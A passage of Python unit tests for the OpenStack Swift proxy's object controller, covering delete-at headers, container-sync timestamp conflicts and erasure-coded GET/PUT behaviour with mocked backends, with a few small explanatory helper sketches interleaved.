self.assertIn('X-Delete-At-Container', given_headers)
def test_PUT_converts_delete_after_to_delete_at(self):
req = swob.Request.blank('/v1/a/c/o', method='PUT', body='',
headers={'Content-Type': 'foo/bar',
'X-Delete-After': '60'})
put_headers = []
def capture_headers(ip, port, device, part, method, path, headers,
**kwargs):
if method == 'PUT':
put_headers.append(headers)
codes = [201] * self.obj_ring.replicas
t = time.time()
with set_http_connect(*codes, give_connect=capture_headers):
with mock.patch('time.time', lambda: t):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
expected_delete_at = str(int(t) + 60)
for given_headers in put_headers:
self.assertEqual(given_headers.get('X-Delete-At'),
expected_delete_at)
self.assertIn('X-Delete-At-Host', given_headers)
self.assertIn('X-Delete-At-Device', given_headers)
self.assertIn('X-Delete-At-Partition', given_headers)
self.assertIn('X-Delete-At-Container', given_headers)
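# Hedged sketch: the X-Delete-After to X-Delete-At conversion exercised
# above is just integer arithmetic on the request time, mirroring
# expected_delete_at = str(int(t) + 60). _demo_delete_at is invented.
def _demo_delete_at(delete_after, now):
    return str(int(now) + int(delete_after))
assert _demo_delete_at('60', now=1000.9) == '1060'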
def test_container_sync_put_x_timestamp_not_found(self):
test_indexes = [None] + [int(p) for p in POLICIES]
for policy_index in test_indexes:
self.app.container_info['storage_policy'] = policy_index
put_timestamp = utils.Timestamp.now().normal
req = swob.Request.blank(
'/v1/a/c/o', method='PUT', headers={
'Content-Length': 0,
'X-Timestamp': put_timestamp})
codes = [201] * self.obj_ring.replicas
with set_http_connect(*codes):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
def test_container_sync_put_x_timestamp_match(self):
test_indexes = [None] + [int(p) for p in POLICIES]
for policy_index in test_indexes:
self.app.container_info['storage_policy'] = policy_index
put_timestamp = utils.Timestamp.now().normal
req = swob.Request.blank(
'/v1/a/c/o', method='PUT', headers={
'Content-Length': 0,
'X-Timestamp': put_timestamp})
ts_iter = itertools.repeat(put_timestamp)
codes = [409] * self.obj_ring.replicas
with set_http_connect(*codes, timestamps=ts_iter):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 202)
def test_container_sync_put_x_timestamp_older(self):
ts = (utils.Timestamp(t) for t in itertools.count(int(time.time())))
test_indexes = [None] + [int(p) for p in POLICIES]
for policy_index in test_indexes:
self.app.container_info['storage_policy'] = policy_index
req = swob.Request.blank(
'/v1/a/c/o', method='PUT', headers={
'Content-Length': 0,
'X-Timestamp': next(ts).internal})
ts_iter = itertools.repeat(next(ts).internal)
codes = [409] * self.obj_ring.replicas
with set_http_connect(*codes, timestamps=ts_iter):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 202)
def test_container_sync_put_x_timestamp_newer(self):
ts = (utils.Timestamp(t) for t in itertools.count(int(time.time())))
test_indexes = [None] + [int(p) for p in POLICIES]
for policy_index in test_indexes:
orig_timestamp = next(ts).internal
req = swob.Request.blank(
'/v1/a/c/o', method='PUT', headers={
'Content-Length': 0,
'X-Timestamp': next(ts).internal})
ts_iter = itertools.repeat(orig_timestamp)
codes = [201] * self.obj_ring.replicas
with set_http_connect(*codes, timestamps=ts_iter):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
def test_put_x_timestamp_conflict(self):
ts = (utils.Timestamp(t) for t in itertools.count(int(time.time())))
req = swob.Request.blank(
'/v1/a/c/o', method='PUT', headers={
'Content-Length': 0,
'X-Timestamp': next(ts).internal})
ts_iter = iter([next(ts).internal, None, None])
codes = [409] + [201] * (self.obj_ring.replicas - 1)
with set_http_connect(*codes, timestamps=ts_iter):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 202)
def test_put_x_timestamp_conflict_with_missing_backend_timestamp(self):
ts = (utils.Timestamp(t) for t in itertools.count(int(time.time())))
req = swob.Request.blank(
'/v1/a/c/o', method='PUT', headers={
'Content-Length': 0,
'X-Timestamp': next(ts).internal})
ts_iter = iter([None, None, None])
codes = [409] * self.obj_ring.replicas
with set_http_connect(*codes, timestamps=ts_iter):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 202)
def test_put_x_timestamp_conflict_with_other_weird_success_response(self):
ts = (utils.Timestamp(t) for t in itertools.count(int(time.time())))
req = swob.Request.blank(
'/v1/a/c/o', method='PUT', headers={
'Content-Length': 0,
'X-Timestamp': next(ts).internal})
ts_iter = iter([next(ts).internal, None, None])
codes = [409] + [(201, 'notused')] * (self.obj_ring.replicas - 1)
with set_http_connect(*codes, timestamps=ts_iter):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 202)
def test_put_x_timestamp_conflict_with_if_none_match(self):
ts = (utils.Timestamp(t) for t in itertools.count(int(time.time())))
req = swob.Request.blank(
'/v1/a/c/o', method='PUT', headers={
'Content-Length': 0,
'If-None-Match': '*',
'X-Timestamp': next(ts).internal})
ts_iter = iter([next(ts).internal, None, None])
codes = [409] + [(412, 'notused')] * (self.obj_ring.replicas - 1)
with set_http_connect(*codes, timestamps=ts_iter):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 412)
def test_container_sync_put_x_timestamp_race(self):
ts = (utils.Timestamp(t) for t in itertools.count(int(time.time())))
test_indexes = [None] + [int(p) for p in POLICIES]
for policy_index in test_indexes:
put_timestamp = next(ts).internal
req = swob.Request.blank(
'/v1/a/c/o', method='PUT', headers={
'Content-Length': 0,
'X-Timestamp': put_timestamp})
# the object nodes respond 409 because another in-flight request
# finished first and the on-disk timestamp is now equal to this
# request's (see the conflict-resolution sketch after this test)
put_ts = [put_timestamp] * self.obj_ring.replicas
codes = [409] * self.obj_ring.replicas
ts_iter = iter(put_ts)
with set_http_connect(*codes, timestamps=ts_iter):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 202)
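# Hedged sketch (invented helper) of the conflict rule the
# container-sync tests encode: when a backend answers 409, the proxy
# compares timestamps; if the on-disk copy is as new as the request, or
# the backend reports no timestamp, the PUT resolves to 202 Accepted.
def _demo_resolve_conflict(req_ts, backend_ts):
    if backend_ts is None or backend_ts >= req_ts:
        return 202  # the data is already there, or newer
    return 201
assert _demo_resolve_conflict(5, 5) == 202
assert _demo_resolve_conflict(5, None) == 202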
def test_container_sync_put_x_timestamp_unsynced_race(self):
ts = (utils.Timestamp(t) for t in itertools.count(int(time.time())))
test_indexes = [None] + [int(p) for p in POLICIES]
for policy_index in test_indexes:
put_timestamp = next(ts).internal
req = swob.Request.blank(
'/v1/a/c/o', method='PUT', headers={
'Content-Length': 0,
'X-Timestamp': put_timestamp})
# only one in-flight request finished
put_ts = [None] * (self.obj_ring.replicas - 1)
put_resp = [201] * (self.obj_ring.replicas - 1)
put_ts += [put_timestamp]
put_resp += [409]
ts_iter = iter(put_ts)
codes = put_resp
with set_http_connect(*codes, timestamps=ts_iter):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 202)
def test_x_timestamp_not_overridden(self):
def do_test(method, base_headers, resp_code):
# no given x-timestamp
req = swob.Request.blank(
'/v1/a/c/o', method=method, headers=base_headers)
codes = [resp_code] * self.replicas()
with mocked_http_conn(*codes) as fake_conn:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, resp_code)
self.assertEqual(self.replicas(), len(fake_conn.requests))
for req in fake_conn.requests:
self.assertIn('X-Timestamp', req['headers'])
# check value can be parsed as valid timestamp
Timestamp(req['headers']['X-Timestamp'])
# given x-timestamp is retained
def do_check(ts):
headers = dict(base_headers)
headers['X-Timestamp'] = ts.internal
req = swob.Request.blank(
'/v1/a/c/o', method=method, headers=headers)
codes = [resp_code] * self.replicas()
with mocked_http_conn(*codes) as fake_conn:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, resp_code)
self.assertEqual(self.replicas(), len(fake_conn.requests))
for req in fake_conn.requests:
self.assertEqual(ts.internal,
req['headers']['X-Timestamp'])
do_check(Timestamp.now())
do_check(Timestamp.now(offset=123))
# given x-timestamp gets sanity checked
headers = dict(base_headers)
headers['X-Timestamp'] = 'bad timestamp'
req = swob.Request.blank(
'/v1/a/c/o', method=method, headers=headers)
with mocked_http_conn() as fake_conn:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 400)
self.assertIn('X-Timestamp should be a UNIX timestamp ', resp.body)
do_test('PUT', {'Content-Length': 0}, 200)
do_test('DELETE', {}, 204)
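# Hedged approximation (not the real validator) of the sanity check
# above: X-Timestamp must parse as a UNIX float, otherwise the proxy
# answers 400.
def _demo_valid_x_timestamp(value):
    try:
        float(value)
        return True
    except ValueError:
        return False
assert not _demo_valid_x_timestamp('bad timestamp')
assert _demo_valid_x_timestamp('1234567890.12345')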
@patch_policies(
[StoragePolicy(0, '1-replica', True),
StoragePolicy(1, '5-replica', False),
StoragePolicy(2, '8-replica', False),
StoragePolicy(3, '15-replica', False)],
fake_ring_args=[
{'replicas': 1}, {'replicas': 5}, {'replicas': 8}, {'replicas': 15}])
class TestReplicatedObjControllerVariousReplicas(BaseObjectControllerMixin,
unittest.TestCase):
controller_cls = obj.ReplicatedObjectController
@contextmanager
def capture_http_requests(get_response):
class FakeConn(object):
def __init__(self, req):
self.req = req
self.resp = None
def getresponse(self):
self.resp = get_response(self.req)
return self.resp
class ConnectionLog(object):
def __init__(self):
self.connections = []
def __len__(self):
return len(self.connections)
def __getitem__(self, i):
return self.connections[i]
def __iter__(self):
return iter(self.connections)
def __call__(self, ip, port, method, path, headers, qs, ssl):
req = {
'ip': ip,
'port': port,
'method': method,
'path': path,
'headers': headers,
'qs': qs,
'ssl': ssl,
}
conn = FakeConn(req)
self.connections.append(conn)
return conn
fake_conn = ConnectionLog()
with mock.patch('swift.common.bufferedhttp.http_connect_raw',
new=fake_conn):
yield fake_conn
class ECObjectControllerMixin(BaseObjectControllerMixin):
# Add a few helper methods for EC tests.
def _make_ec_archive_bodies(self, test_body, policy=None):
policy = policy or self.policy
return encode_frag_archive_bodies(policy, test_body)
def _make_ec_object_stub(self, pattern='test', policy=None,
timestamp=None):
policy = policy or self.policy
test_body = pattern * policy.ec_segment_size
test_body = test_body[:-random.randint(1, 1000)]
return make_ec_object_stub(test_body, policy, timestamp)
def _fake_ec_node_response(self, node_frags):
return fake_ec_node_response(node_frags, self.policy)
def test_GET_with_duplicate_but_sufficient_frag_indexes(self):
obj1 = self._make_ec_object_stub()
# proxy should ignore duplicated frag indexes and continue search for
# a set of unique indexes, finding last one on a handoff
node_frags = [
{'obj': obj1, 'frag': 0},
{'obj': obj1, 'frag': 0}, # duplicate frag
{'obj': obj1, 'frag': 1},
{'obj': obj1, 'frag': 1}, # duplicate frag
{'obj': obj1, 'frag': 2},
{'obj': obj1, 'frag': 2}, # duplicate frag
{'obj': obj1, 'frag': 3},
{'obj': obj1, 'frag': 3}, # duplicate frag
{'obj': obj1, 'frag': 4},
{'obj': obj1, 'frag': 4}, # duplicate frag
{'obj': obj1, 'frag': 10},
{'obj': obj1, 'frag': 11},
{'obj': obj1, 'frag': 12},
{'obj': obj1, 'frag': 13},
] * self.policy.ec_duplication_factor
node_frags.append({'obj': obj1, 'frag': 5}) # first handoff
fake_response = self._fake_ec_node_response(node_frags)
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['etag'], obj1['etag'])
self.assertEqual(md5(resp.body).hexdigest(), obj1['etag'])
# expect a request to all primaries plus one handoff
self.assertEqual(self.replicas() + 1, len(log))
collected_indexes = defaultdict(list)
for conn in log:
fi = conn.resp.headers.get('X-Object-Sysmeta-Ec-Frag-Index')
if fi is not None:
collected_indexes[fi].append(conn)
self.assertEqual(len(collected_indexes), self.policy.ec_ndata)
def test_GET_with_duplicate_but_insufficient_frag_indexes(self):
obj1 = self._make_ec_object_stub()
# proxy should ignore duplicated frag indexes and continue search for
# a set of unique indexes, but fails to find one
node_frags = [
{'obj': obj1, 'frag': 0},
{'obj': obj1, 'frag': 0}, # duplicate frag
{'obj': obj1, 'frag': 1},
{'obj': obj1, 'frag': 1}, # duplicate frag
{'obj': obj1, 'frag': 2},
{'obj': obj1, 'frag': 2}, # duplicate frag
{'obj': obj1, 'frag': 3},
{'obj': obj1, 'frag': 3}, # duplicate frag
{'obj': obj1, 'frag': 4},
{'obj': obj1, 'frag': 4}, # duplicate frag
{'obj': obj1, 'frag': 10},
{'obj': obj1, 'frag': 11},
{'obj': obj1, 'frag': 12},
{'obj': obj1, 'frag': 13},
]
# ... and the rest are 404s, which are limited by request_count
# (2 * replicas by default) rather than by the max_extra_requests
# limit, because retries for 404 responses happen in ResumingGetter
node_frags += [[]] * (self.replicas() * 2 - len(node_frags))
fake_response = self._fake_ec_node_response(node_frags)
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 404)
# expect a request to all nodes
self.assertEqual(2 * self.replicas(), len(log))
collected_indexes = defaultdict(list)
for conn in log:
fi = conn.resp.headers.get('X-Object-Sysmeta-Ec-Frag-Index')
if fi is not None:
collected_indexes[fi].append(conn)
self.assertEqual(len(collected_indexes), self.policy.ec_ndata - 1)
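# Hedged sketch of the unique-fragment bookkeeping the two
# duplicate-index tests above assert: the proxy needs ec_ndata
# *distinct* fragment indexes to decode, and duplicates add nothing.
def _demo_enough_unique_frags(frag_indexes, ec_ndata):
    return len(set(frag_indexes)) >= ec_ndata
assert _demo_enough_unique_frags([0, 0, 1, 1, 2], 3)
assert not _demo_enough_unique_frags([0, 0, 1, 1], 3)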
@patch_policies(with_ec_default=True)
class TestECObjController(ECObjectControllerMixin, unittest.TestCase):
container_info = {
'status': 200,
'read_acl': None,
'write_acl': None,
'sync_key': None,
'versions': None,
'storage_policy': '0',
}
controller_cls = obj.ECObjectController
def _add_frag_index(self, index, headers):
# helper method to add a frag index header to an existing header dict
hdr_name = 'X-Object-Sysmeta-Ec-Frag-Index'
return dict(headers.items() + [(hdr_name, index)])
def test_determine_chunk_destinations(self):
class FakePutter(object):
def __init__(self, index):
self.node_index = index
controller = self.controller_cls(
self.app, 'a', 'c', 'o')
# create a dummy list of putters, check no handoffs
putters = []
for index in range(self.policy.object_ring.replica_count):
putters.append(FakePutter(index))
got = controller._determine_chunk_destinations(putters, self.policy)
expected = {}
for i, p in enumerate(putters):
expected[p] = i
self.assertEqual(got, expected)
# now let's make a handoff at the end
orig_index = putters[-1].node_index
putters[-1].node_index = None
got = controller._determine_chunk_destinations(putters, self.policy)
self.assertEqual(got, expected)
putters[-1].node_index = orig_index
# now let's make a handoff at the start
putters[0].node_index = None
got = controller._determine_chunk_destinations(putters, self.policy)
self.assertEqual(got, expected)
putters[0].node_index = 0
# now let's make a handoff in the middle
putters[2].node_index = None
got = controller._determine_chunk_destinations(putters, self.policy)
self.assertEqual(got, expected)
putters[2].node_index = 2
# now let's make all of them handoffs
for index in range(self.policy.object_ring.replica_count):
putters[index].node_index = None
got = controller._determine_chunk_destinations(putters, self.policy)
self.assertEqual(sorted(got), sorted(expected))
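# Hedged sketch (one plausible scheme, invented names) of the
# chunk-destination idea exercised above: primaries keep their own
# node_index, and handoff putters (node_index None) are dealt the
# leftover fragment indexes.
def _demo_assign_frag_indexes(node_indexes, replica_count):
    unused = [i for i in range(replica_count) if i not in node_indexes]
    return [i if i is not None else unused.pop(0) for i in node_indexes]
assert _demo_assign_frag_indexes([0, None, 2], 3) == [0, 1, 2]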
def test_GET_simple(self):
req = swift.common.swob.Request.blank('/v1/a/c/o')
get_statuses = [200] * self.policy.ec_ndata
get_hdrs = [{'Connection': 'close'}] * self.policy.ec_ndata
with set_http_connect(*get_statuses, headers=get_hdrs):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertIn('Accept-Ranges', resp.headers)
self.assertNotIn('Connection', resp.headers)
def _test_if_match(self, method):
num_responses = self.policy.ec_ndata if method == 'GET' else 1
def _do_test(match_value, backend_status,
etag_is_at='X-Object-Sysmeta-Does-Not-Exist'):
req = swift.common.swob.Request.blank(
'/v1/a/c/o', method=method,
headers={'If-Match': match_value,
'X-Backend-Etag-Is-At': etag_is_at})
get_resp = [backend_status] * num_responses
resp_headers = {'Etag': 'frag_etag',
'X-Object-Sysmeta-Ec-Etag': 'data_etag',
'X-Object-Sysmeta-Alternate-Etag': 'alt_etag'}
with set_http_connect(*get_resp, headers=resp_headers):
resp = req.get_response(self.app)
self.assertEqual('data_etag', resp.headers['Etag'])
return resp
# wildcard
resp = _do_test('*', 200)
self.assertEqual(resp.status_int, 200)
# match
resp = _do_test('"data_etag"', 200)
self.assertEqual(resp.status_int, 200)
# no match
resp = _do_test('"frag_etag"', 412)
self.assertEqual(resp.status_int, 412)
# match wildcard against an alternate etag
resp = _do_test('*', 200,
etag_is_at='X-Object-Sysmeta-Alternate-Etag')
self.assertEqual(resp.status_int, 200)
# match against an alternate etag
resp = _do_test('"alt_etag"', 200,
etag_is_at='X-Object-Sysmeta-Alternate-Etag')
self.assertEqual(resp.status_int, 200)
# no match against an alternate etag
resp = _do_test('"data_etag"', 412,
etag_is_at='X-Object-Sysmeta-Alternate-Etag')
self.assertEqual(resp.status_int, 412)
def test_GET_if_match(self):
self._test_if_match('GET')
def test_HEAD_if_match(self):
self._test_if_match('HEAD')
def _test_if_none_match(self, method):
num_responses = self.policy.ec_ndata if method == 'GET' else 1
def _do_test(match_value, backend_status,
etag_is_at='X-Object-Sysmeta-Does-Not-Exist'):
req = swift.common.swob.Request.blank(
'/v1/a/c/o', method=method,
headers={'If-None-Match': match_value,
'X-Backend-Etag-Is-At': etag_is_at})
get_resp = [backend_status] * num_responses
resp_headers = {'Etag': 'frag_etag',
'X-Object-Sysmeta-Ec-Etag': 'data_etag',
'X-Object-Sysmeta-Alternate-Etag': 'alt_etag'}
with set_http_connect(*get_resp, headers=resp_headers):
resp = req.get_response(self.app)
self.assertEqual('data_etag', resp.headers['Etag'])
return resp
# wildcard
resp = _do_test('*', 304)
self.assertEqual(resp.status_int, 304)
# match
resp = _do_test('"data_etag"', 304)
self.assertEqual(resp.status_int, 304)
# no match
resp = _do_test('"frag_etag"', 200)
self.assertEqual(resp.status_int, 200)
# match wildcard against an alternate etag
resp = _do_test('*', 304,
etag_is_at='X-Object-Sysmeta-Alternate-Etag')
self.assertEqual(resp.status_int, 304)
# match against an alternate etag
resp = _do_test('"alt_etag"', 304,
etag_is_at='X-Object-Sysmeta-Alternate-Etag')
self.assertEqual(resp.status_int, 304)
# no match against an alternate etag
resp = _do_test('"data_etag"', 200,
etag_is_at='X-Object-Sysmeta-Alternate-Etag')
self.assertEqual(resp.status_int, 200)
def test_GET_if_none_match(self):
self._test_if_none_match('GET')
def test_HEAD_if_none_match(self):
self._test_if_none_match('HEAD')
def test_GET_simple_x_newest(self):
req = swift.common.swob.Request.blank('/v1/a/c/o',
headers={'X-Newest': 'true'})
codes = [200] * self.policy.ec_ndata
with set_http_connect(*codes):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
def test_GET_error(self):
req = swift.common.swob.Request.blank('/v1/a/c/o')
get_resp = [503] + [200] * self.policy.ec_ndata
with set_http_connect(*get_resp):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
def test_GET_with_body(self):
req = swift.common.swob.Request.blank('/v1/a/c/o')
# turn a real body into fragments
segment_size = self.policy.ec_segment_size
real_body = ('asdf' * segment_size)[:-10]
# split it up into chunks
chunks = [real_body[x:x + segment_size]
for x in range(0, len(real_body), segment_size)]
fragment_payloads = []
for chunk in chunks:
fragments = self.policy.pyeclib_driver.encode(chunk)
if not fragments:
break
fragment_payloads.append(
fragments * self.policy.ec_duplication_factor)
# sanity
sanity_body = ''
for fragment_payload in fragment_payloads:
sanity_body += self.policy.pyeclib_driver.decode(
fragment_payload)
self.assertEqual(len(real_body), len(sanity_body))
self.assertEqual(real_body, sanity_body)
# list(zip(...)) for py3 compatibility (zip is lazy there)
node_fragments = list(zip(*fragment_payloads))
self.assertEqual(len(node_fragments), self.replicas()) # sanity
headers = {'X-Object-Sysmeta-Ec-Content-Length': str(len(real_body))}
responses = [(200, ''.join(node_fragments[i]), headers)
for i in range(POLICIES.default.ec_ndata)]
status_codes, body_iter, headers = zip(*responses)
with set_http_connect(*status_codes, body_iter=body_iter,
headers=headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(len(real_body), len(resp.body))
self.assertEqual(real_body, resp.body)
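# Hedged sketch of the segmenting used above: the body is sliced into
# ec_segment_size pieces and the final slice may be short.
def _demo_segments(body, segment_size):
    return [body[x:x + segment_size]
            for x in range(0, len(body), segment_size)]
assert _demo_segments('abcdefg', 3) == ['abc', 'def', 'g']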
def test_PUT_simple(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT',
body='')
codes = [201] * self.replicas()
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
with set_http_connect(*codes, expect_headers=expect_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
def test_PUT_with_body_and_bad_etag(self):
segment_size = self.policy.ec_segment_size
test_body = ('asdf' * segment_size)[:-10]
codes = [201] * self.replicas()
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
conns = []
def capture_expect(conn):
# stash the backend connection so we can verify that it is closed
# (no data will be sent)
conns.append(conn)
# send a bad etag in the request headers
headers = {'Etag': 'bad etag'}
req = swift.common.swob.Request.blank(
'/v1/a/c/o', method='PUT', headers=headers, body=test_body)
with set_http_connect(*codes, expect_headers=expect_headers,
give_expect=capture_expect):
resp = req.get_response(self.app)
self.assertEqual(422, resp.status_int)
self.assertEqual(self.replicas(), len(conns))
for conn in conns:
self.assertTrue(conn.closed)
# make the footers callback send a bad Etag footer
footers_callback = make_footers_callback('not the test body')
env = {'swift.callback.update_footers': footers_callback}
req = swift.common.swob.Request.blank(
'/v1/a/c/o', method='PUT', environ=env, body=test_body)
with set_http_connect(*codes, expect_headers=expect_headers):
resp = req.get_response(self.app)
self.assertEqual(422, resp.status_int)
def test_txn_id_logging_ECPUT(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT',
body='')
self.app.logger.txn_id = req.environ['swift.trans_id'] = 'test-txn-id'
codes = [(100, Timeout(), 503, 503)] * self.replicas()
stdout = BytesIO()
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
with set_http_connect(*codes, expect_headers=expect_headers), \
mock.patch('sys.stdout', stdout):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 503)
for line in stdout.getvalue().splitlines():
self.assertIn('test-txn-id', line)
self.assertIn('Trying to get ',
stdout.getvalue())
def test_PUT_with_explicit_commit_status(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT',
body='')
codes = [(100, 100, 201)] * self.replicas()
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
with set_http_connect(*codes, expect_headers=expect_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
def test_PUT_error(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT',
body='')
codes = [503] * self.replicas()
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
with set_http_connect(*codes, expect_headers=expect_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 503)
def test_PUT_mostly_success(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT',
body='')
codes = [201] * self.quorum()
codes += [503] * (self.replicas() - len(codes))
random.shuffle(codes)
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
with set_http_connect(*codes, expect_headers=expect_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
def test_PUT_error_commit(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT',
body='')
codes = [(100, 503, Exception('not used'))] * self.replicas()
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
with set_http_connect(*codes, expect_headers=expect_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 503)
def test_PUT_mostly_success_commit(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT',
body='')
codes = [201] * self.quorum()
codes += [(100, 503, Exception('not used'))] * (
self.replicas() - len(codes))
random.shuffle(codes)
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
with set_http_connect(*codes, expect_headers=expect_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
def test_PUT_mostly_error_commit(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT',
body='')
codes = [(100, 503, Exception('not used'))] * self.quorum()
if isinstance(self.policy, ECStoragePolicy):
codes *= self.policy.ec_duplication_factor
codes += [201] * (self.replicas() - len(codes))
random.shuffle(codes)
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
with set_http_connect(*codes, expect_headers=expect_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 503)
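# Hedged sketch of the quorum arithmetic behind the "mostly" tests
# above: at least quorum() successful commits out of replicas() yields
# 201, anything less yields 503. _demo_put_status is an invented name.
def _demo_put_status(successes, quorum):
    return 201 if successes >= quorum else 503
assert _demo_put_status(10, 10) == 201
assert _demo_put_status(9, 10) == 503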
def test_PUT_commit_timeout(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT',
body='')
codes = [201] * (self.replicas() - 1)
codes.append((100, Timeout(), Exception('not used')))
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
with set_http_connect(*codes, expect_headers=expect_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
def test_PUT_commit_exception(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT',
body='')
codes = [201] * (self.replicas() - 1)
codes.append((100, Exception('kaboom!'), Exception('not used')))
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
with set_http_connect(*codes, expect_headers=expect_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
def test_PUT_ec_error_during_transfer_data(self):
class FakeReader(object):
def read(self, size):
raise IOError('error message')
req = swob.Request.blank('/v1/a/c/o.jpg', method='PUT',
body='test body')
req.environ['wsgi.input'] = FakeReader()
req.headers['content-length'] = '6'
codes = [201] * self.replicas()
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
with set_http_connect(*codes, expect_headers=expect_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 499)
def test_PUT_ec_chunkreadtimeout_during_transfer_data(self):
class FakeReader(object):
def read(self, size):
raise exceptions.ChunkReadTimeout()
req = swob.Request.blank('/v1/a/c/o.jpg', method='PUT',
body='test body')
req.environ['wsgi.input'] = FakeReader()
req.headers['content-length'] = '6'
codes = [201] * self.replicas()
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
with set_http_connect(*codes, expect_headers=expect_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 408)
def test_PUT_ec_timeout_during_transfer_data(self):
class FakeReader(object):
def read(self, size):
raise exceptions.Timeout()
req = swob.Request.blank('/v1/a/c/o.jpg', method='PUT',
body='test body')
req.environ['wsgi.input'] = FakeReader()
req.headers['content-length'] = '6'
codes = [201] * self.replicas()
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
with set_http_connect(*codes, expect_headers=expect_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 499)
def test_PUT_ec_exception_during_transfer_data(self):
class FakeReader(object):
def read(self, size):
raise Exception('exception message')
req = swob.Request.blank('/v1/a/c/o.jpg', method='PUT',
body='test body')
req.environ['wsgi.input'] = FakeReader()
req.headers['content-length'] = '6'
codes = [201] * self.replicas()
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
with set_http_connect(*codes, expect_headers=expect_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 500)
def test_PUT_with_body(self):
segment_size = self.policy.ec_segment_size
test_body = ('asdf' * segment_size)[:-10]
# make the footers callback not include Etag footer so that we can
# verify that the correct EC-calculated Etag is included in footers
# sent to backend
footers_callback = make_footers_callback()
env = {'swift.callback.update_footers': footers_callback}
req = swift.common.swob.Request.blank(
'/v1/a/c/o', method='PUT', environ=env)
etag = md5(test_body).hexdigest()
size = len(test_body)
req.body = test_body
codes = [201] * self.replicas()
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
resp_headers = {
'Some-Other-Header': 'Four',
'Etag': 'ignored',
}
put_requests = defaultdict(lambda: {'boundary': None, 'chunks': []})
def capture_body(conn, chunk):
put_requests[conn.connection_id]['chunks'].append(chunk)
def capture_headers(ip, port, device, part, method, path, headers,
**kwargs):
conn_id = kwargs['connection_id']
put_requests[conn_id]['boundary'] = headers[
'X-Backend-Obj-Multipart-Mime-Boundary']
put_requests[conn_id]['backend-content-length'] = headers[
'X-Backend-Obj-Content-Length']
put_requests[conn_id]['x-timestamp'] = headers[
'X-Timestamp']
with set_http_connect(*codes, expect_headers=expect_headers,
give_send=capture_body,
give_connect=capture_headers,
headers=resp_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
timestamps = {captured_req['x-timestamp']
for captured_req in put_requests.values()}
